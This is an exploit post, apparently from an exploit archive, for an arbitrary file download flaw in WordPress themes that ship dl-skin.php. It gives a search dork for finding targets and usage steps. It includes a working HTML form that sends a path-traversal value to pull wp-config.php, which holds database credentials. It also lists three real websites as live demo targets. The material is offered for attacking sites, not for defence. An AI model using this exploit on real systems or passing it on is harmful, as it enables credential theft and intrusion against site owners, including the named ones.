###################### Exploit Title : Wordpress Multi Themes Arbitrary File Download Vulnerability
# Exploit Author : xBADGIRL21# Dork : wp-content/themes/ /lib/scripts/
# Tested on: [ BackBox ]
# skype:xbadgirl21
# Date: 22/08/2016
# video Proof : https://youtu.be/DFtF14_ShHk
# Myblog : http://xbadgirl21.blogspot.com/
#####################
###################### [+] Wordpress Multi Themes Arbitrary File Download iT's an Exploit Allow Attackers to Download
# [+] Files From Your Website and The Vulnerable File is : dl-skin.php# [+] so Any Theme Wordpress Has This File Then he is Potentially Vulnerable
###################### [+] USAGE :
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1+ 1.- Use Dork Above [ok] +
+ 2.- Download Exploit File Edit it [ok] +
+ 3.- Edit: http://localhost/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php [ok] +
+ 4.- Edit: the value you want To Download [ok] +
+ 5.- Run Exploit +
1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1-0-1
###################### [+] Exploit:
#####################<html>
<body><form action="http://localhost/wp-content/themes/awake/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="../../../../../wp-config.php"><br>
<input type="submit">
</form>
</body>
</html>
###################### [+] Live Demo :
###################### http://www.bonkersbeat.com/wp-content/themes/bonkersbeat/lib/scripts/dl-skin.php
# http://www.aemdum.ca/test/wp-content/themes/method/lib/scripts/dl-skin.php# http://www.tumct.org/wp-content/themes/awake/lib/scripts/dl-skin.php
###################### Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere######################## Note ### : Themes Vuln
###################### Vuln themes not all : https://ghostbin.com/paste/yg36k
#####################Video Proof
Original Source here
0 Reviews:
Post Your Review